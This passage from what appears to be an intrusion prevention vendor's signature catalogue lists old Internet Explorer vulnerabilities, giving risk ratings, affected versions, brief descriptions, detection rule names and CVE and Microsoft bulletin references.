Situation: HTTP_SS-Microsoft-Internet-Explorer-DOM-Memory-Corruption-CVE-2011-1251
File-Text_Microsoft-Internet-Explorer-DOM-Memory-Corruption-CVE-2011-1251
References:
CVE-2011-1251
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1251
MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050
Back to top

Microsoft-Internet-Explorer-DOM-Mergeattributes-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-411-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to insufficient input validation in the DOM mergeAttributes script method. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.
Situation: File-Text_Microsoft-Internet-Explorer-DOM-Mergeattributes-Memory-DOS
File-Text_Microsoft-Internet-Explorer-DOM-Mergeattributes-Memory-Corruption
References:
CVE-2010-0247
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0247
MS10-002
http://technet.microsoft.com/security/bulletin/MS10-002
Back to top

Microsoft-Internet-Explorer-Drag-And-Drop-CVE-2011-1254

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-396-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7; Windows 2008 R2
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Drag-And-Drop-CVE-2011-1254
File-Text_Microsoft-Internet-Explorer-Drag-And-Drop-CVE-2011-1254
References:
CVE-2011-1254
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1254
MS11-050
http://technet.microsoft.com/security/bulletin/MS11-050
Back to top

Microsoft-Internet-Explorer-Ebcrypt-ActiveX-Denial-of-Service

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Input Validation
Description: There is a denial of service flaw in the EBCrypt ActiveX control.
Situation: File-Text_Microsoft-Internet-Explorer-Ebcrypt-ActiveX-Denial-of-Service
References:
CVE-2007-5110
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5110
BID-25787
http://www.securityfocus.com/bid/25787
OSVDB-37736
http://www.osvdb.org/37736
Back to top

Microsoft-Internet-Explorer-Embed-Element-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-246-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The flaw is due to a race condition when processing malicious script that manipulates the EMBED element. An attacker can persuade the target user to open a malicious web page to exploit this vulnerability. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be run with privileges of the currently logged on user. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Embed-Element-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Embed-Element-Memory-Corruption
References:
CVE-2009-0553
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0553
BID-34424
http://www.securityfocus.com/bid/34424
OSVDB-53626
http://www.osvdb.org/53626
MS09-014
http://technet.microsoft.com/security/bulletin/MS09-014
Back to top

Microsoft-Internet-Explorer-EUC-JP-Character-Encoding-Universal-XSS

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-539-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0;Internet Explorer 7.0;Internet Explorer 8.0;Internet Explorer 9.0;Internet Explorer 10.0
Type: Input Validation
Description: A universal cross site scripting vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way that IE handles EUC-JP character encoding. A remote attacker could exploit this vulnerability by submitting specially crafted HTML code into a target web site that uses EUC-JP character encoding, such as a web forum or social networking site. In the case of successful exploitation, arbitrary attacker code would run in the target users' browsers in the security context of the affected web site.
Situation: File-Text_Internet-Explorer-EUC-JP-Character-Encoding-Universal-XSS
References:
CVE-2013-3192
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3192
BID-61664
http://www.securityfocus.com/bid/61664
OSVDB-96192
http://www.osvdb.org/96192
MS13-059
http://technet.microsoft.com/security/bulletin/MS13-059
Back to top

Microsoft-Internet-Explorer-Event-Handler-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-687-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0
Type: Malfunction
Description: There exists a use-after-free vulnerability in Internet Explorer. An exploitation can lead to execution of arbitrary code in the security context of the target user.
Situation: File-Text_Microsoft-Internet-Explorer-Event-Handler-Use-After-Free
References:
CVE-2011-1997
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1997
BID-49962
http://www.securityfocus.com/bid/49962
OSVDB-76209
http://www.osvdb.org/76209
MS11-081
http://technet.microsoft.com/security/bulletin/MS11-081
Back to top

Microsoft-Internet-Explorer-Event-Listener-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-480-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Event-Listener-Use-After-Free
References:
CVE-2012-2546
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2546
BID-55645
http://www.securityfocus.com/bid/55645
MS12-063
http://technet.microsoft.com/security/bulletin/MS12-063
Back to top

Microsoft-Internet-Explorer-execCommand-File-Type-Spoofing

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Input Validation
Description: A vulnerability exists in Microsoft Internet Explorer when the script command execCommand is used to save a document. A specially crafted filename will be displayed as another file type. An attacker can exploit this vulnerability to save code to the target system with the extension of an executable program (e.g. .js file) by tricking a user into believing that he is saving a non-executable file (e.g., .html file).
Situation: File-Text_Microsoft-Internet-Explorer-execCommand-File-Type-Spoofing
Back to top

Microsoft-Internet-Explorer-FTP-Client-Directory-Traversal

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-426-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer
Type: Directory Traversal
Description: There is a vulnerability in the way Microsoft Internet Explorer handles filenames downloaded via the FTP protocol. Insufficient input validation can allow for the creation of a file in an arbitrary location on the client filesystem. Exploitation of this vulnerability allows an attacker to modify the local content of a target system, potentially resulting in the execution of arbitrary code with the security context of the currently logged in user. If the user uses the "Copy to folder..." method to save the specially crafted file, a "Browse for folder" dialog prompts the user to specify the destination folder. This is normal behaviour for the affected products. If the user uses the "copy and paste" or "drag and drop" method, then no additional user prompts are made. The directory traversal may be visible to the user. However, this may be hidden by using a filename that starts with other characters such as a large number of spaces. In the case of a successful attack, the target will not exhibit any unusual behaviour before or during the malicious file download.
Situation: Generic_CS-Microsoft-Internet-Explorer-FTP-Client-Directory-Traversal
FTP_CS-Retr-Directory-Traversal
References:
CVE-2004-1376
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1376
BID-12160
http://www.securityfocus.com/bid/12160
Back to top

Microsoft-Internet-Explorer-FTP-Command-Injection

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-410-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Code Injection
Description: A vulnerability exists in the way Microsoft Internet Explorer handles URLs using the ftp:// scheme. Insufficient input validation can allow FTP command injection using such URLs. An attacker exploiting this vulnerability can supply commands that will be executed on an FTP server within the security context of the credentials supplied by the user.
Situation: File-Text_Microsoft-Internet-Explorer-FTP-Command-Injection
References:
BID-11826
http://www.securityfocus.com/bid/11826
Back to top

Microsoft-Internet-Explorer-Hhctrl.ocx-Image-Property-Heap-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-368-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0
Type: Buffer Overflow
Description: There exists a heap memory corruption vulnerability in the Microsoft Internet Explorer browser. The flaw is caused by an improper check during processing of a specially crafted Image property of a specific HTML Help Control ActiveX Object. An attacker can exploit this vulnerability to inject and execute arbitrary code in the security context of the currently logged in user. Upon an attack where code execution is unsuccessful, the affected browser will terminate. The behaviour of the host system after an attack attempt resulting in arbitrary code injection and its subsequent execution is dependent on the intention of the injected code. The injected code will be run in the security context of the currently logged in user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-Hhctrl.ocx-Image-Property-Heap-Corruption
File-Text_Microsoft-Internet-Explorer-Hhctrl.ocx-Image-Property-Heap-Corruption
References:
CVE-2006-3357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3357
BID-18769
http://www.securityfocus.com/bid/18769
OSVDB-26835
http://www.osvdb.org/26835
MS06-046
http://technet.microsoft.com/security/bulletin/MS06-046
Back to top

Microsoft-Internet-Explorer-History.go-Method-Double-Free-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-246-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The flaw is due to a double-free condition when processing malicious script that manipulates the history object. An attacker can persuade the target user to open a malicious web page to exploit this vulnerability. In an attack scenario, where arbitrary code is injected and executed on the target system, the behaviour of the target is dependent on the intention of the malicious code. The injected code will be run with privileges of the currently logged on user. If such an attack is not executed successfully, the vulnerable application may terminate as a result of invalid memory access.
Situation: HTTP_SS-Microsoft-Internet-Explorer-History.go-Method-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-History.go-Method-Memory-Corruption
References:
CVE-2009-0552
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0552
BID-34423
http://www.securityfocus.com/bid/34423
OSVDB-53625
http://www.osvdb.org/53625
MS09-014
http://technet.microsoft.com/security/bulletin/MS09-014
Back to top

Microsoft-Internet-Explorer-HTML-Attribute-Handling-Memory-Corruption

About this vulnerability: A memory corruption vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-176-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to insufficient validation of HTML tags, which leads to memory corruption. Remote attackers can exploit this vulnerability by persuading a target user to visit a specially-crafted web page. Successful exploitation causes memory corruption that can lead to arbitrary code execution in the security context of the logged in user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-HTML-Attribute-Handling-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-HTML-Attribute-Handling-Memory-Corruption
References:
CVE-2008-3476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3476
BID-31618
http://www.securityfocus.com/bid/31618
MS08-058
http://technet.microsoft.com/security/bulletin/MS08-058
Back to top

Microsoft-Internet-Explorer-HTML-Element-Memory-Corruption-CVE-2010-3345

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-HTML-Element-Memory-Corruption-CVE-2010-3345
File-Text_Microsoft-Internet-Explorer-HTML-Element-CVE-2010-3345
References:
CVE-2010-3345
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3345
MS10-090
http://technet.microsoft.com/security/bulletin/MS10-090
Back to top

Microsoft-Internet-Explorer-HTML-Embed-Tag-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-191-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Internet Explorer. There is insufficient boundary checking when handling overly long SRC attributes in an HTML embed tag. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious HTML document. Successful attack can allow arbitrary code injection and execution with privileges of the currently logged on user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-HTML-Embed-Tag-Stack-Buffer-Overflow
File-Text_Microsoft-Internet-Explorer-HTML-Embed-Tag-Stack-Buffer-Overflow
References:
CVE-2008-4261
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4261
MS08-073
http://technet.microsoft.com/security/bulletin/MS08-073
Back to top

Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-193-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer web browser. The browser does not handle HTML embedded into XML documents correctly. A remote attacker may use a crafted web page to execute arbitrary code in the context of the current user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption
HTTP_SS-Microsoft-Internet-Explorer-Datasource-Xml-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Datasource-Xml-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-HTML-Embedded-In-Xml-Memory-Corruption
References:
CVE-2008-4844
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4844
BID-32721
http://www.securityfocus.com/bid/32721
MS08-078
http://technet.microsoft.com/security/bulletin/MS08-078
Back to top

Microsoft-Internet-Explorer-HTML-Help-Remote-Code-Execution

About this vulnerability: Code execution vulnerability in HTML Help ActiveX Control
Risk: High
First detected in: sgpkg-ips-100-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Javascript Injection
Description: There is a vulnerability in the way the HTML Help ActiveX control processes cross domain requests. A specially crafted web document can deceive Internet Explorer into executing remote code in the Local Computer security zone. An attacker can exploit this vulnerability to bypass the security zone restrictions and execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_Microsoft-Internet-Explorer-HTML-Help-Remote-Code-Execution
File-Text_Microsoft-Internet-Explorer-HTML-Help-Remote-Code-Execution
References:
CVE-2004-1043
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1043
MS05-001
http://technet.microsoft.com/security/bulletin/MS05-001
Back to top

Microsoft-Internet-Explorer-HTML-Layout-CVE-2012-0011

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-440-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-HTML-Layout-CVE-2012-0011
References:
CVE-2012-0011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0011
MS12-010
http://technet.microsoft.com/security/bulletin/MS12-010
Back to top

Microsoft-Internet-Explorer-HTML-Layout-Memory-Corruption-CVE-2010-2560

About this vulnerability: A memory corruption vulnerability in Microsoft Internet Explorer
Risk: Critical
First detected in: sgpkg-ips-329-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. By enticing a target user to visit a malicious web page, an attacker can execute arbitrary code with the privileges of the logged in user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-HTML-Layout-Memory-Corruption-CVE-2010-2560
File-Text_Microsoft-Internet-Explorer-HTML-Layout-CVE-2010-2560
References:
CVE-2010-2560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2560
MS10-053
http://technet.microsoft.com/security/bulletin/MS10-053
Back to top

Microsoft-Internet-Explorer-HTML-Layout-Use-After-Free

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-826-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 7.0; Internet Explorer 8.0; Internet Explorer 9.0
Type: Malfunction
Description: There exists a use-after-free vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-HTML-Layout-Use-After-Free
References:
CVE-2012-0011
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0011
MS12-010
http://technet.microsoft.com/security/bulletin/MS12-010
Back to top

Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-0248

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-279-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000; Windows XP; Windows 2003; Windows Vista; Windows 2008; Windows 7
Software: Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Input Validation
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due an error in the handling of deleted HTML table objects, allowing the use of a pointer even after it has been freed. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user.
Situation: HTTP_SS-Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-0248
File-Text_Microsoft-Internet-Explorer-HTML-Object-CVE-2010-0248
References:
CVE-2010-0248
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0248
MS10-002
http://technet.microsoft.com/security/bulletin/MS10-002
Back to top

Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3340

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0; Internet Explorer 7.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3340
File-Text_Microsoft-Internet-Explorer-HTML-Object-CVE-2010-3340
References:
CVE-2010-3340
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3340
MS10-090
http://technet.microsoft.com/security/bulletin/MS10-090
Back to top

Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3343

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-HTML-Object-Memory-Corruption-CVE-2010-3343
File-Text_Microsoft-Internet-Explorer-HTML-Object-CVE-2010-3343
References:
CVE-2010-3343
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3343
MS10-090
http://technet.microsoft.com/security/bulletin/MS10-090
Back to top

Microsoft-Internet-Explorer-HTML-Objects-Memory-Corruption-CVE-2009-1918

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-234-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 6.0; Internet Explorer 7.0; Internet Explorer 8.0
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-HTML-Objects-Memory-Corruption-CVE-2009-1918
File-Text_Microsoft-Internet-Explorer-HTML-Objects-CVE-2009-1918
References:
CVE-2009-1918
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1918
BID-35826
http://www.securityfocus.com/bid/35826
MS09-034
http://technet.microsoft.com/security/bulletin/MS09-034
Back to top

Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-414-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer;
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way that Internet Explorer accesses an object that has been deleted. A remote attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML document. In a sophisticated attack where code injection is successful, the behaviour of the target host is entirely dependent on the intended function of the injected code. The injected code, in this case, would execute within the security context of the currently logged in user. If such an attack is not executed successfully, the vulnerable application may terminate abnormally.
Situation: File-Text_Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption
References:
CVE-2010-0807
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0807
BID-39024
http://www.securityfocus.com/bid/39024
MS10-018
http://technet.microsoft.com/security/bulletin/MS10-018
Back to top

Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption-CVE-2006-3637

About this vulnerability: A vulnerability in Internet Explorer
Risk: High
First detected in: sgpkg-ips-586-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 6.0
Type: Input Validation
Description: A vulnerability has been reported in Microsoft Internet Explorer that can be exploited by remote attackers to execute arbitrary code on the user's machine. The vulnerability is due to improper handling of certain layout positioning which may corrupt the memory and could result in execution of arbitrary code. Attackers can exploit this vulnerability by enticing an unsuspecting user to visit a specially crafted web page that contains malicious HTML code.
Situation: File-Text_Microsoft-Internet-Explorer-HTML-Rendering-Memory-Corruption-CVE-2006-3637
References:
CVE-2006-3637
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3637
BID-18277
http://www.securityfocus.com/bid/18277
OSVDB-27853
http://www.osvdb.org/27853
MS06-042
http://technet.microsoft.com/security/bulletin/MS06-042
Back to top

Microsoft-Internet-Explorer-HTML-Sanitization-CVE-2012-1858

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-457-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 8.0; Microsoft InfoPath 2007; Microsoft InfoPath 2010; Microsoft Office SharePoint Server 2007; Microsoft Office SharePoint Server 2010; Microsoft Groove Server 2010; Microsoft SharePoint Services; Microsoft SharePoint Foundation; Microsoft Office Web Apps 2010
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-HTML-Sanitization-CVE-2012-1858
References:
CVE-2012-1858
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1858
OSVDB-82861
http://www.osvdb.org/82861
MS12-037
http://technet.microsoft.com/security/bulletin/MS12-037
MS12-039
http://technet.microsoft.com/security/bulletin/MS12-039
MS12-050
http://technet.microsoft.com/security/bulletin/MS12-050
Back to top

Microsoft-Internet-Explorer-HTML-Tag-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: Moderate
First detected in: sgpkg-ips-436-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A memory corruption vulnerability exists in Microsoft Internet Explorer. The vulnerability is caused due to the application's failure to properly handle certain HTML tags. A remote attacker may exploit this issue via a malicious web page to execute arbitrary code in the context of the currently logged in user. Since code injection resulting from leveraging this vulnerability has been found to be highly unlikely, generally an attack attempt will result in the termination of the affected process. In the event where successful code injection is a result of an attack attempt, the behaviour of the target system is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the currently logged-in user.
Situation: File-Text_Microsoft-Internet-Explorer-HTML-Tag-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-HTML-Tag-Memory-Corruption-2
References:
CVE-2006-1188
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1188
MS06-013
http://technet.microsoft.com/security/bulletin/MS06-013
Back to top

Microsoft-Internet-Explorer-HTML-Time-Element-Memory-Corruption-CVE-2010-3346

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 8.0; Internet Explorer 7.0; Internet Explorer 6.0
Type: Malfunction
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: HTTP_SS-Microsoft-Internet-Explorer-HTML-Time-Element-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-HTML-Time-Element-CVE-2010-3346
File-Text_Microsoft-Internet-Explorer-HTML-Time-Element-CVE-2010-3346-2
References:
CVE-2010-3346
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3346
BID-45261
http://www.securityfocus.com/bid/45261
MS10-090
http://technet.microsoft.com/security/bulletin/MS10-090
Back to top

Microsoft-Internet-Explorer-HTTP-Response-Double-Free-Memory-Corruption

About this vulnerability: A double free vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-162-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Double Free
Description: There is a remote code execution vulnerability in Internet Explorer. Microsoft has a proprietary extension to the HTTP protocol that allows responses with status code 449, Retry With. If such responses contain no action, Internet Explorer attempts to access a memory region that has been previously released or has not been correctly initialized. Remote unauthenticated attackers could exploit this vulnerability by persuading a target user to visit a website hosted by a web server that sends certain malicious error responses. Successful exploitation would cause a memory corruption that may lead to arbitrary code execution in the security context of the logged in user.
Situation: HTTP_SLS-Microsoft-Internet-Explorer-HTTP-Response-Double-Free-Memory-Corruption
References:
CVE-2008-2256
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2256
BID-30611
http://www.securityfocus.com/bid/30611
MS08-045
http://technet.microsoft.com/security/bulletin/MS08-045
Back to top

Microsoft-Internet-Explorer-Image-Processing-Argument-Handling-Memory-Corruption

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-144-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in Microsoft Internet Explorer. The vulnerability is due to the way the Internet Explorer image handling module handles certain arguments. Remote attackers can exploit this vulnerability by persuading target users to visit a specially-crafted web page. Successful exploitation may allow the attacker to execute arbitrary code on the vulnerable client system, in the context of the logged in user.
Situation: HTTP_SS-Internet-Explorer-Image-Processing-Argument-Handling-Memory-Corruption
File-Text_Internet-Explorer-Image-Processing-Argument-Handling-Memory-Corruption
References:
CVE-2008-0078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0078
BID-27689
http://www.securityfocus.com/bid/27689
MS08-010
http://technet.microsoft.com/security/bulletin/MS08-010
Back to top

Microsoft-Internet-Explorer-Information-Disclosure-CVE-2015-2413

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-661-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 11.0; Internet Explorer 10.0
Type: Input Validation
Description: There is a vulnerability in Microsoft Internet Explorer.
Situation: File-Text_Microsoft-Internet-Explorer-Information-Disclosure-CVE-2015-2413
References:
CVE-2015-2413
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2413
MS15-065
http://technet.microsoft.com/security/bulletin/MS15-065
Back to top

Microsoft-Internet-Explorer-Initfromstring-Function-Out-Of-Bounds-Memory-Access

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-724-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 9.0; Internet Explorer 10.0; Internet Explorer 11.0
Type: Malfunction
Description: There exists an Out Of Bounds vulnerability in Microsoft Internet Explorer. A remote attacker can use this to acchieve this to gain sensitive information from the process memory.
Situation: File-TextId_Microsoft-Internet-Explorer-Initfromstring-Function-Out-Of-Bounds-Memory-Access
File-Text_Microsoft-Internet-Explorer-Initfromstring-Function-Out-Of-Bounds-Memory-Access
References:
CVE-2015-6086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6086
MS15-112
http://technet.microsoft.com/security/bulletin/MS15-112
Back to top

Microsoft-Internet-Explorer-insertRow-Remote-Code-Execution

About this vulnerability: A vulnerability in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-457-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: A remote code execution vulnerability exists in Internet Explorer. The vulnerability is due to memory corruption when specific modifications to TABLE elements occur. A remote, unauthenticated attacker can exploit this vulnerability by enticing a target user to open either an HTML document with Internet Explorer, or a Microsoft Office document with an embedded "safe for initialization" ActiveX component that hosts the IE rendering engine. A successful exploitation attempt could result in the execution of arbitrary code in the security context of the target user.
